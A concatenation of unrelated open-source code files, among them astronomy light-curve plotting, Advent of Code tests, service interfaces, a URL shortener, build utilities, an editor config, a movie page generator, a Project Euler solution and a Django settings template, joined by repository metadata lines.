fit_b.flux[el] + 2*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
fluxLowLim = [val for val in [
fit_b.flux[el] - 2*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
dictAx[b][r[b], c[b]].fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.2, linewidth=0.5)
"""
Setting limits for fill_between (±3 fluxErr band)
"""
fluxUpLim = [val for val in [
fit_b.flux[el] + 3*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
fluxLowLim = [val for val in [
fit_b.flux[el] - 3*fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
dictAx[b][r[b], c[b]].fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.1, linewidth=0.5)
dictAx[b][r[b], c[b]].plot(fit_b.shiftedMjd, fit_b.flux,
color='#7f0000',
linewidth=2)
scatterLab = 'SN ID {:<d}'.format(candidate.SNID)
dictAx[b][r[b], c[b]].scatter(epoch, flux,
s=10, label=scatterLab, c='black', marker='x')
dictAx[b][r[b], c[b]].errorbar(epoch, flux,
data.fluxErr, fmt=None, color='black', ecolor='black')
if not fit.peaked:
pass
dictAx[b][r[b], c[b]].legend(
loc='best', framealpha=0.3, fontsize='10')
else:
label = str(candidate.SNID)+" BAD CURVE"
dictAx[b][r[b], c[b]].plot([0, 1], [0, 1], color='red',
label=label)
dictAx[b][r[b], c[b]].plot([0, 1], [1, 0], color='red')
dictAx[b][r[b], c[b]].legend(
loc='best', framealpha=0.3, fontsize='10')
c[b] += 1
print indent + "Plots saved in files:"
if not os.path.exists(path.abspath(args.dirFit + "plots" + os.sep)):
os.makedirs(args.dirFit + "plots")
for b in dictFig.keys():
dictFig[b].savefig(
args.dirFit + "plots"+ os.sep + GPkern + \
"_band_{:<1}_{:<f}.png".format(b,timeMark),
dpi=300
)
print indent + " - " + args.dirFit + "plots" + os.sep + \
GPkern + "_band_{:<1}_{:<f}.png".format(b,timeMark)
plt.close('all')
"""
PLOT OBSERVATION AND FIT (publication style)
--nice-plots
"""
if args.nicePlots:
"""
Plot a single candidate, in one band or all of them,
with confidence regions around the fit.
"""
# if args.nBands != 1 or args.nBands != 4:
# args.nBands = 1
if args.cand == -1:
args.cand = np.random.random_integers(
low=0, high=len(lsDirData))
fname = 'DES_SN{:0>6d}.DAT'.format(args.cand)
candidate = util.get_sn_from_file(
args.dirData+fname
)
fname = 'DES_SN{:0>6d}_FIT.DAT'.format(args.cand)
tmpSN = util.get_sn_from_file(
args.dirFit+fname,
magFlag=args.mag,
)
"""
Initializing SupernovaFit object
"""
fit = cls.SupernovaFit(tmpSN, tmpSN.kern if hasattr(tmpSN, 'kern') else None)
for b in tmpSN.lcsDict.keys():
fit.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr,
magFlag=args.mag
)
if fit.r.badCurve:
raise SystemExit('Bad r curve!')
fit.shift_mjds()
"""
Fixing shiftedMjd for not-peaked LCs
"""
if fit.peaked == False:
"""
correcting using CC results
"""
for b in candidate.lcsDict.keys():
fit.lcsDict[b].shiftedMjd = [el + fit.ccMjdMaxFlux
for el in fit.lcsDict[b].shiftedMjd]
bands = candidate.lcsDict.keys() if args.allBands else args.band
"""
Pre-process data so it can be compared with the fit (made from
pre-processed data)
"""
for b in bands:
if (not candidate.lcsDict[b].badCurve) and (not fit.lcsDict[b].badCurve):
candidate = util.pre_process(candidate, b)
candidate.lcsDict[b].mjd = [el - fit.r.mjd[fit.r.max_flux_index]
for el in candidate.lcsDict[b].mjd]
if fit.peaked == False:
candidate.lcsDict[b].mjd = [el + fit.ccMjdMaxFlux
for el in candidate.lcsDict[b].mjd]
else:
raise SystemExit('Bad {:1s} curve!'.format(b))
if args.allBands:
fig, ax = plt.subplots(nrows=2, ncols=2,
# figsize=(16.5, 11.7),
tight_layout=False
)
axDict = {
'g':ax[0,0],
'r':ax[0,1],
'i':ax[1,0],
'z':ax[1,1]
}
# fig.subplots_adjust(left=0.05, right=0.97, top=0.94, wspace=0.29)
else:
fig = plt.figure()
xlim = [-35,12]
ylim = [-10,10]
# fig, ax = plt.subplots(nrows=2, ncols=1,
# # figsize=(16.5, 11.7),
# tight_layout=False
# )
# axDict = {
# 'g':ax[0,0],
# 'r':ax[0,1],
# 'i':ax[1,0],
# 'z':ax[1,1]
# }
if not args.allBands:
fit_b = fit.lcsDict[args.band]
data = candidate.lcsDict[args.band]
if not data.badCurve and not fit_b.badCurve:
epoch = data.mjd
flux = data.flux
"""
Setting limits for fill_between (±1 fluxErr band)
"""
fluxUpLim = [el for el in [
fit_b.flux[i] + fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
fluxLowLim = [el for el in [
fit_b.flux[i] - fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
plt.fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.4, linewidth=0.5)
# axDict[b].fill_between(fit_b.shiftedMjd,
# fluxUpLim, fluxLowLim,
# facecolor='red', alpha=0.4, linewidth=0.5)
"""
Setting limits for fill_between (±2 fluxErr band)
"""
fluxUpLim = [el for el in [
fit_b.flux[i] + 2*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
fluxLowLim = [el for el in [
fit_b.flux[i] - 2*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
plt.fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.2, linewidth=0.5)
# axDict[b].fill_between(fit_b.shiftedMjd,
# fluxUpLim, fluxLowLim,
# facecolor='red', alpha=0.2, linewidth=0.5)
"""
Setting limits for fill_between (±3 fluxErr band)
"""
fluxUpLim = [el for el in [
fit_b.flux[i] + 3*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
fluxLowLim = [el for el in [
fit_b.flux[i] - 3*fit_b.fluxErr[i]
for i in range(len(fit_b.flux))
]]
plt.fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.1, linewidth=0.5)
# axDict[b].fill_between(fit_b.shiftedMjd,
# fluxUpLim, fluxLowLim,
# facecolor='red', alpha=0.1, linewidth=0.5)
plt.plot(fit_b.shiftedMjd, fit_b.flux,
color='#7f0000',
linewidth=2,
label='GP fit')
# axDict[b].plot(fit_b.shiftedMjd, fit_b.flux,
# color='#7f0000',
# linewidth=2)
plt.scatter(epoch, flux,
s=30, label='data', c='black', marker='x')
# axDict[b].scatter(epoch, flux,
# s=10, label=str(candidate.SNID), c='black', marker='x')
plt.errorbar(epoch, flux,
data.fluxErr, fmt=None, color='black', ecolor='black')
# plt.xlim(xlim)
plt.ylim(ylim)
title = 'SN ID {:d} - Band {:s}'.format(candidate.SNID, args.band)
plt.title(title)
plt.xlabel('Epoch [mjd]')
plt.ylabel('Flux [adu]')
plt.legend(loc='upper right', scatterpoints=1)
# axDict[b].errorbar(epoch, flux,
# data.fluxErr, fmt=None, color='black', ecolor='black')
print "\n" + indent \
+ "The process took {:5.3f} secs.".format(time.time()-start_time)
|
unlicense
| -168,076,514,215,684,130
| 34.063946
| 108
| 0.443582
| false
| 4.110367
| false
| false
| false
|
mpirnat/aoc2016
|
day22/test.py
|
1
|
1854
|
#!/usr/bin/env python
import unittest
from day22 import Node, make_nodes, viable_nodes
class TestMakingNodes(unittest.TestCase):
def test_makes_nodes_from_input(self):
df = """
/dev/grid/node-x0-y0 87T 71T 16T 81%
/dev/grid/node-x0-y1 93T 72T 21T 77%
/dev/grid/node-x1-y0 86T 66T 20T 76%
/dev/grid/node-x1-y1 93T 64T 29T 68%
"""
nodes = make_nodes(df)
self.assertEqual(nodes, [
[Node(name='node-x0-y0', size=87, used=71, avail=16),
Node(name='node-x1-y0', size=86, used=66, avail=20)],
[Node(name='node-x0-y1', size=93, used=72, avail=21),
Node(name='node-x1-y1', size=93, used=64, avail=29)]])
class TestFindingViableNodes(unittest.TestCase):
grid = [
[Node(name='A', size=100, used=1, avail=99),
Node(name='B', size=100, used=50, avail=50)],
[Node(name='C', size=100, used=0, avail=100),
Node(name='D', size=100, used=100, avail=0)],
[Node(name='E', size=50, used=10, avail=40),
Node(name='F', size=100, used=60, avail=40)]]
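    # The expected pairs below encode the puzzle's viability rule: (A, B) is
    # viable when A is not empty, A and B are different nodes, and A's used
    # data fits in B's available space.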
def test_finds_viable_nodes(self):
grid = self.grid
nodes = viable_nodes(grid)
self.assertEqual(nodes, {
(grid[0][0], grid[0][1]),
(grid[0][0], grid[1][0]),
(grid[0][0], grid[2][0]),
(grid[0][0], grid[2][1]),
(grid[0][1], grid[0][0]),
(grid[0][1], grid[1][0]),
(grid[1][1], grid[1][0]),
(grid[2][0], grid[0][0]),
(grid[2][0], grid[0][1]),
(grid[2][0], grid[1][0]),
(grid[2][0], grid[2][1]),
(grid[2][1], grid[0][0]),
(grid[2][1], grid[1][0])})
if __name__ == '__main__':
unittest.main()
|
mit
| 3,496,811,144,772,983,300
| 32.709091
| 67
| 0.481122
| false
| 2.843558
| true
| false
| false
|
cordis/pycloudia-chat
|
pyligaforex/services/gateways/interfaces.py
|
1
|
3985
|
from abc import ABCMeta, abstractmethod
class IServiceFactory(object):
__metaclass__ = ABCMeta
@abstractmethod
def create_service(self):
"""
:rtype: L{pyligaforex.services.gateways.interfaces.IService}
"""
class IService(object):
__metaclass__ = ABCMeta
@abstractmethod
def create_gateway(self, channel):
"""
:type channel: L{pycloudia.services.beans.Channel}
:rtype: L{Deferred} of C{None}
"""
@abstractmethod
def delete_gateway(self, runtime, reason=None):
"""
:type runtime: C{str}
:type reason: C{str} or C{None}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
@abstractmethod
def authenticate_gateway(self, runtime, user_id):
"""
:type runtime: C{str}
:type user_id: C{str}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
@abstractmethod
def process_incoming_package(self, runtime, package):
"""
:type runtime: C{str}
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
@abstractmethod
def process_outgoing_package(self, runtime, package):
"""
:type runtime: C{str}
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.GatewayNotFoundError}
"""
class IGateway(object):
__metaclass__ = ABCMeta
@abstractmethod
def set_client_user_id(self, user_id):
"""
:type user_id: C{str}
:rtype: L{Deferred} of C{None}
"""
@abstractmethod
def process_incoming_package(self, package):
"""
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
:raise: L{pyligaforex.services.gateways.exceptions.HeaderNotFoundError}
"""
@abstractmethod
def process_outgoing_package(self, package):
"""
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
"""
class IGatewayFactory(object):
__metaclass__ = ABCMeta
@abstractmethod
def create_gateway(self, channel):
"""
:type channel: L{pycloudia.services.beans.Channel}
:rtype: L{pyligaforex.services.gateways.interfaces.IGateway}
"""
class IRouter(object):
__metaclass__ = ABCMeta
@abstractmethod
def get_target_channel(self, package):
"""
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{pycloudia.services.beans.Channel}
:raise: L{pyligaforex.services.gateways.exceptions.HeaderNotFoundError}
:raise: L{pyligaforex.services.gateways.exceptions.ServiceNotFoundError}
"""
class IDao(object):
__metaclass__ = ABCMeta
@abstractmethod
def set_gateway_client_address(self, client_id, facade_address):
"""
:type client_id: C{str}
:type facade_address: C{str}
:return: deferred with facade_address
:rtype: L{Deferred} of C{str}
"""
@abstractmethod
def set_gateway_client_user_id(self, client_id, user_id):
"""
:type client_id: C{str}
:type user_id: C{str}
:return: deferred with user_id
:rtype: L{Deferred} of C{str}
"""
class IClients(object):
__metaclass__ = ABCMeta
@abstractmethod
def process_outgoing_package(self, client_address, client_id, package):
"""
:type client_address: C{str}
:type client_id: C{str}
:type package: L{pycloudia.packages.interfaces.IPackage}
:rtype: L{Deferred} of C{None}
"""
|
mit
| 484,113,746,543,363,000
| 26.867133
| 80
| 0.611794
| false
| 3.682994
| false
| false
| false
|
SmallFatCYW/tcn-analysis-python
|
tcnanalysis.py
|
1
|
2745
|
#!/usr/bin/env python
"""
____ _____ _ _ _
| _ \ _ |_ _|__ _ __ / \ _ __ __ _| |_ _ ___(_)___
| |_) | | | || |/ __| '_ \ / _ \ | '_ \ / _` | | | | / __| / __|
| __/| |_| || | (__| | | |/ ___ \| | | | (_| | | |_| \__ \ \__ \
|_| \__, ||_|\___|_| |_/_/ \_\_| |_|\__,_|_|\__, |___/_|___/
|___/ |___/
t.cn JSON and XML Analysis - v0.2Fix
By iPixelOldC & http://hoc117.top
License: MIT
"""
import json
import xml.etree.cElementTree as et
import urllib.request
import re
import os
def JSONReturn(site):
"""
json analysis: JSONReturn(site='Website URL(format:http[s]://xxx)')
return: {'url_short': 'http://t.cn/xxx', 'url_long': site, 'type': 0}
    type: type of the link, 0: ordinary web page, 1: video, 2: music, 3: activity, 5: vote
"""
response = urllib.request.urlopen('http://api.t.sina.com.cn/short_url/shorten.json?source=3271760578&url_long={0!s}'.format((site)))
html = response.read().decode('utf8')
loads = json.loads(str(html))
return loads[0]
def XMLReturn(site):
"""
xml analysis: XMLReturn(site='Website URL(format:http[s]://xxx)')
    return: {'url_short': 'http://t.cn/xxx', 'url_long': site, 'type': type}
"""
response = urllib.request.urlopen('http://api.t.sina.com.cn/short_url/shorten.xml?source=3271760578&url_long={0!s}'.format((site)))
html = response.read().decode('utf8')
loads = et.fromstring(str(html))[0]
return {"url_short": loads[0].text, "url_long": loads[1].text, "type": loads[2].text}
if __name__ == "__main__":
print(__doc__)
inputurl = input('>>Please enter url: ')
if 'http://' in inputurl:
pass
else:
inputurl = 'http://'+inputurl
while True:
inputJorX = input('>>(x)ml or (j)son: ').lower()
if inputJorX not in ('x', 'j'):
print("> Please enter 'x' or 'j'!")
else:
break
if 'x' == inputJorX:
r_xml = XMLReturn(inputurl)
print(">>{0!s}: \n> Short URL: {1!s}".format(r_xml["url_long"], r_xml["url_short"]))
if 'j' == inputJorX:
r_json = JSONReturn(inputurl)
print(">>{0!s}: \n> Short URL: {1!s}".format(r_json["url_long"], r_json["url_short"]))
while True:
save_yn = input('>>Do you want to save it?[Y/n]').lower()
if save_yn == 'n':
break
elif save_yn == 'y':
print("> Saving...")
open('{0!s}.json'.format((re.search(r'(http://+)(.*)', inputurl).group(2))), 'w+').write(str(JSONReturn(inputurl)))
print("> OK")
break
else:
print('Please enter (y) or (n)')
|
mit
| 2,421,101,698,474,163,000
| 36.388889
| 136
| 0.48272
| false
| 2.844609
| false
| false
| false
|
iamroger/vpn
|
win/utils.py
|
1
|
3331
|
import os, sys, re, shutil, tarfile, subprocess
j = os.path.join
class Cd(object):
"""
Cd is a context manager that allows
    you to temporarily change the working directory.
with Cd(dir) as cd:
...
"""
def __init__(self, directory):
self._dir = directory
def orig(self):
return self._orig
def __enter__(self):
self._orig = os.getcwd()
os.chdir(self._dir)
return self
def __exit__(self, *args):
os.chdir(self._orig)
class ModEnv(object):
"""
Context manager for temporarily
modifying an env var. Normally used to make
changes to PATH.
"""
def __init__(self, key, value):
self.key = key;
self.value = value;
def __enter__(self):
self.orig_value = os.environ.get(self.key)
os.environ[self.key] = self.value
return self
def __exit__(self, *args):
if self.orig_value is not None:
os.environ[self.key] = self.orig_value
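# Typical use (as in vc_cmd below): temporarily extend PATH for one command, e.g.
#   with ModEnv('PATH', os.environ['PATH'] + ';C:\\some\\dir'):
#       call('some_command', shell=True)
# (the directory name here is purely illustrative)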
def rmtree(dir):
print "RMTREE", dir
shutil.rmtree(dir, ignore_errors=True)
def makedirs(dir):
print "MAKEDIRS", dir
os.makedirs(dir)
def wipetree(dir):
print "WIPETREE", dir
shutil.rmtree(dir, ignore_errors=True)
if not os.path.isdir(dir):
os.mkdir(dir)
def extract_dict(d, k, default=None):
if k in d:
v = d[k]
del d[k]
else:
v = default
return v
def scan_prefixes(prefix, dir):
fns = []
for dirpath, dirnames, filenames in os.walk(dir):
for f in filenames:
if f.startswith(prefix):
fns.append(f)
break
return fns
def one_prefix(prefix, dir):
f = scan_prefixes(prefix, dir)
if len(f) == 0:
raise ValueError("prefix %r not found in dir %r" % (prefix, dir))
elif len(f) >= 2:
raise ValueError("prefix %r is ambiguous in dir %r: %r" % (prefix, dir, f))
return f[0]
def tarsplit(fn):
if fn.endswith(".tar.gz") or fn.endswith(".tgz"):
t = 'gz'
b = fn[:-7]
elif fn.endswith(".tar.bz2") or fn.endswith(".tbz"):
t = 'bz2'
b = fn[:-8]
else:
raise ValueError("unrecognized tar file type: %r" % (fn,))
return b, t
def tarextract(fn, t):
print "TAR EXTRACT %s [%s]" % (fn, t)
tar = tarfile.open(fn, mode='r:'+t)
try:
tar.extractall()
finally:
tar.close()
def expand(pkg_prefix, srcdir):
f = one_prefix(pkg_prefix, srcdir)
b, t = tarsplit(f)
# remove previous directory
rmtree(b)
# expand it
tarextract(os.path.join(srcdir, f), t)
return b
def call(cmd, **kw):
print "***", cmd
ignore_errors = extract_dict(kw, 'ignore_errors', False)
extra_env = extract_dict(kw, 'extra_env', None)
if extra_env:
env = kw.get('env', os.environ).copy()
env.update(extra_env)
kw['env'] = env
succeed = extract_dict(kw, 'succeed', 0)
ret = subprocess.call(cmd, **kw)
if not ignore_errors and ret != succeed:
raise ValueError("command failed with status %r (expected %r)" % (ret, succeed))
def vc_cmd(parms, cmd, succeed=0):
with ModEnv('PATH', "%s;%s\\VC" % (os.environ['PATH'], parms['MSVC_DIR'])):
status = call('vcvarsall.bat x86 && %s' % (cmd,), shell=True, succeed=succeed)
|
agpl-3.0
| 2,720,960,673,189,920,000
| 23.674074
| 88
| 0.565296
| false
| 3.278543
| false
| false
| false
|
RomanPlusPlus/smartGroceryList
|
.ycm_extra_conf.py
|
1
|
3559
|
import os
import sys
import ycm_core
def DirectoryOfThisScript():
return os.path.dirname(os.path.abspath(__file__))
preferred_build_type = 'debug'
flags = [
'-std=c++11'
,'-Wall'
,'-Wextra'
,'-Wconversion'
,'-Wno-deprecated'
,'-I%s' % os.path.join(DirectoryOfThisScript(), 'build', preferred_build_type, 'src')
,'-I%s' % os.path.join(DirectoryOfThisScript(), 'src')
]
compilation_database_folder = os.path.join(DirectoryOfThisScript(), 'build')
configurations = ['debug', 'release']
databases = []
for conf in configurations:
path = os.path.join(compilation_database_folder, conf)
if os.path.exists(path):
databases.append(ycm_core.CompilationDatabase(path))
SOURCE_EXTENSIONS = ['.cpp', '.cxx', '.cc', '.c', '.m', '.mm']
def MakeRelativePathsInFlagsAbsolute(flags, working_directory):
if not working_directory:
return list(flags)
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join(working_directory, flag)
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join(working_directory, path)
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile(filename):
extension = os.path.splitext(filename)[1]
return extension in ['.h', '.hxx', '.hpp', '.hh']
def GetCompilationInfoForFileInDb(database, filename):
# The compile_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile(filename):
basename = os.path.splitext(filename)[0]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists(replacement_file):
compilation_info = database.GetCompilationInfoForFile(replacement_file)
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile(filename)
def GetCompilationInfoForFile(filename):
for db in databases:
info = GetCompilationInfoForFileInDb(db, filename)
if info is None:
continue
else:
return info
return None
def FlagsForFile(filename, **kwargs):
if len(databases) != 0:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile(filename)
if not compilation_info:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute(flags, relative_to)
else:
final_flags = MakeRelativePathsInFlagsAbsolute(compilation_info.compiler_flags_, compilation_info.compiler_working_dir_)
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute(flags, relative_to)
return {
'flags': final_flags,
'do_cache': True
}
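# Illustrative call (hypothetical path): FlagsForFile('/abs/path/src/main.cpp')
# returns {'flags': [...], 'do_cache': True}. If a compilation database was
# found under build/<configuration>, the flags come from it; otherwise the
# hard-coded `flags` above are made absolute relative to this script.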
|
gpl-3.0
| -8,626,690,842,388,371,000
| 31.651376
| 132
| 0.638944
| false
| 3.864278
| false
| false
| false
|
pzbadams/udacity
|
fresh_tomatoes.py
|
1
|
5784
|
import webbrowser
import os
import re
# Styles and scripting for the page
main_page_head = '''
<head>
<meta charset="utf-8">
<title>Fresh Tomatoes!</title>
<!-- Bootstrap 3 -->
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap.min.css">
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap-theme.min.css">
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/js/bootstrap.min.js"></script>
<style type="text/css" media="screen">
body {
padding-top: 80px;
}
#trailer .modal-dialog {
margin-top: 200px;
width: 640px;
height: 480px;
}
.hanging-close {
position: absolute;
top: -12px;
right: -12px;
z-index: 9001;
}
#trailer-video {
width: 100%;
height: 100%;
}
.movie-tile {
margin-bottom: 20px;
padding-top: 20px;
}
.movie-tile:hover {
background-color: #EEE;
cursor: pointer;
}
.scale-media {
padding-bottom: 56.25%;
position: relative;
}
.scale-media iframe {
border: none;
height: 100%;
position: absolute;
width: 100%;
left: 0;
top: 0;
background-color: white;
}
</style>
<script type="text/javascript" charset="utf-8">
// Pause the video when the modal is closed
$(document).on('click', '.hanging-close, .modal-backdrop, .modal', function (event) {
// Remove the src so the player itself gets removed, as this is the only
// reliable way to ensure the video stops playing in IE
$("#trailer-video-container").empty();
});
// Start playing the video whenever the trailer modal is opened
$(document).on('click', '.movie-tile', function (event) {
var trailerYouTubeId = $(this).attr('data-trailer-youtube-id')
var sourceUrl = 'http://www.youtube.com/embed/' + trailerYouTubeId + '?autoplay=1&html5=1';
$("#trailer-video-container").empty().append($("<iframe></iframe>", {
'id': 'trailer-video',
'type': 'text-html',
'src': sourceUrl,
'frameborder': 0
}));
});
// Animate in the movies when the page loads
$(document).ready(function () {
$('.movie-tile').hide().first().show("fast", function showNext() {
$(this).next("div").show("fast", showNext);
});
});
</script>
</head>
'''
# The main page layout and title bar
main_page_content = '''
<!DOCTYPE html>
<html lang="en">
<body>
<!-- Trailer Video Modal -->
<div class="modal" id="trailer">
<div class="modal-dialog">
<div class="modal-content">
<a href="#" class="hanging-close" data-dismiss="modal" aria-hidden="true">
<img src="https://lh5.ggpht.com/v4-628SilF0HtHuHdu5EzxD7WRqOrrTIDi_MhEG6_qkNtUK5Wg7KPkofp_VJoF7RS2LhxwEFCO1ICHZlc-o_=s0#w=24&h=24"/>
</a>
<div class="scale-media" id="trailer-video-container">
</div>
</div>
</div>
</div>
<!-- Main Page Content -->
<div class="container">
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<a class="navbar-brand" href="#"><font size="6">Some of My Favorite Movies</font></a>
</div>
</div>
</div>
</div>
<div class="container">
{movie_tiles}
</div>
</body>
</html>
'''
# A single movie entry html template
movie_tile_content = '''
<div class="col-md-10 col-lg-4 movie-tile text-center" data-trailer-youtube-id="{trailer_youtube_id}" data-toggle="modal" data-target="#trailer">
<img src="{poster_image_url}" width="165" height="257">
<h2><font size="5">{movie_title}</font></h2>
<h3><font size="4">{movie_year}</font></h3>
<h4><font size="4">{movie_rating}</font></h4>
<h5><font size="2">{movie_storyline}</font></h5>
</div>
'''
def create_movie_tiles_content(movies):
# The HTML content for this section of the page
content = ''
for movie in movies:
# Extract the youtube ID from the url
youtube_id_match = re.search(r'(?<=v=)[^&#]+', movie.trailer_youtube_url)
youtube_id_match = youtube_id_match or re.search(r'(?<=be/)[^&#]+', movie.trailer_youtube_url)
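        # The first pattern handles ...watch?v=<id> URLs, the second youtu.be/<id>
        # short links; if neither matches, trailer_youtube_id stays None.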
trailer_youtube_id = youtube_id_match.group(0) if youtube_id_match else None
# Append the tile for the movie with its content filled in
content += movie_tile_content.format(
movie_title=movie.title,
movie_year=movie.year,
movie_rating=movie.rating,
movie_storyline=movie.storyline,
poster_image_url=movie.poster_image_url,
trailer_youtube_id=trailer_youtube_id
)
return content
def open_movies_page(movies):
# Create or overwrite the output file
output_file = open('fresh_tomatoes.html', 'w')
# Replace the placeholder for the movie tiles with the actual dynamically generated content
rendered_content = main_page_content.format(movie_tiles=create_movie_tiles_content(movies))
# Output the file
output_file.write(main_page_head + rendered_content)
output_file.close()
# open the output file in the browser
url = os.path.abspath(output_file.name)
webbrowser.open('file://' + url, new=2) # open in a new tab, if possible
|
gpl-2.0
| -5,111,499,279,754,586,000
| 34.054545
| 145
| 0.573824
| false
| 3.528981
| false
| false
| false
|
gillett-hernandez/project-euler
|
Python/problem_58.py
|
1
|
2420
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Gillett Hernandez
# @Date: 2016-03-21 22:33:46
# @Last Modified by: Gillett Hernandez
# @Last Modified time: 2017-08-10 21:14:06
# from mfunctions import is_prime
from itertools import count, chain
from euler_funcs import is_prime_w_primes_given, get_primes, timed
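# NOTE: is_prime (used by eval_proportion and as square_spiral's default primef)
# is not imported here -- its import from mfunctions is commented out above --
# so it must be defined elsewhere before those code paths are exercised.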
# def lag(iterable):
# iterable = iter(iterable)
# lv = next(iterable)
# v = next(iterable)
# yield lv
# yield v
# while True:
# lv, v = v, next(iterable)
# yield v
# def double(iterable):
# for i in iter(iterable):
# yield ik
# yield i
# def dup_last(iterable):
# '''meant to be used with iterators of integers
# adds a duplicate of the last element'''
# for el in iterable:
# yield el
# yield el
# def square_spiral(s=None):
# # 1 1 2 2 3 3 4 4 5 5 6 6
# if s is not None:
# iterable = range(1, s-1)
# else:
# iterable = count(1)
# C = 0
# for i in dup_last(double(iterable)):
# C += i
def eval_proportion(L, lL):
assert isinstance(L, list), L
assert len(L) == 3, L
# each sublist of L will contain necessarily distinct numbers
C = lL * 4 + 1
C1 = len(L[0])*4 + 1
assert C == C1, (lL, len(L[0]))
c = 0
for n in chain(*L):
if is_prime(n):
c += 1
return c*100 / C
def square_spiral(N=None, limit=None, primef = lambda n: is_prime(n)):
# br = ((2*i+1)**2 for i in count(1)) # bottom right, the squares
bl = ((2*i+1)**2-2*i for i in count(1)) # bottom left
tl = ((2*i+1)**2-4*i for i in count(1)) # topleft
tr = ((2*i+1)**2-6*i for i in count(1)) # topright
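    # For ring i the side length is 2*i+1 and the bottom-right corner is (2*i+1)**2;
    # the other corners trail it by multiples of 2*i. E.g. for i=1 the corners are
    # 9 (bottom right), 7 (bottom left), 5 (top left) and 3 (top right).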
c = 0
for i in count():
C = (i+1) * 4 + 1
for g in [bl, tl, tr]:
ng = next(g)
if primef(ng):
# print(ng)
c += 1
p = c*100 / C
if limit is not None and p < limit:
break
if N is not None and i > N-2:
print("bksadiwoqndnslknlasdbllaarrghghghghghgh", i)
break
return i, p
@timed
def main():
# print(square_spiral(3))
# print(square_spiral(20000, 10))
primes = get_primes(limit=27000)
primef = lambda n: is_prime_w_primes_given(n, primes)
radius, proportion = square_spiral(limit=10, primef=primef)
print((radius+1)*2+1)
if __name__ == '__main__':
main()
|
mit
| 6,795,844,792,540,024,000
| 24.744681
| 70
| 0.544215
| false
| 2.877527
| false
| false
| false
|
lborgav/cookiecutter-django
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/{{cookiecutter.project_name}}/settings/base.py
|
1
|
7003
|
# Django base settings for {{cookiecutter.project_name}} project.
from os.path import abspath, basename, dirname, join, normpath
from sys import path
########## PATH CONFIG
# Absolute filesystem path to the Django project folder:
PROJECT_ROOT = dirname(dirname(dirname(abspath(__file__))))
# Absolute filesystem path to the repository folder:
REPO_ROOT = dirname(PROJECT_ROOT)
# Site name:
SITE_NAME = basename(PROJECT_ROOT)
# Add our project to our pythonpath, this way we don't need to type our project
# name in our dotted import paths:
path.append(PROJECT_ROOT)
########## END PATH CONFIG
########## MANAGER CONFIG
ADMINS = (
('{{cookiecutter.author_name}}', '{{cookiecutter.email}}'),
)
MANAGERS = ADMINS
########## END MANAGER CONFIG
########## AUTH MODEL CONFIG
# AUTH_USER_MODEL = 'accounts.CustomUser'
########## END AUTH MODEL CONFIG
########## GENERAL CONFIG
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Sao_Paulo'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-US'
SITE_ID = 1
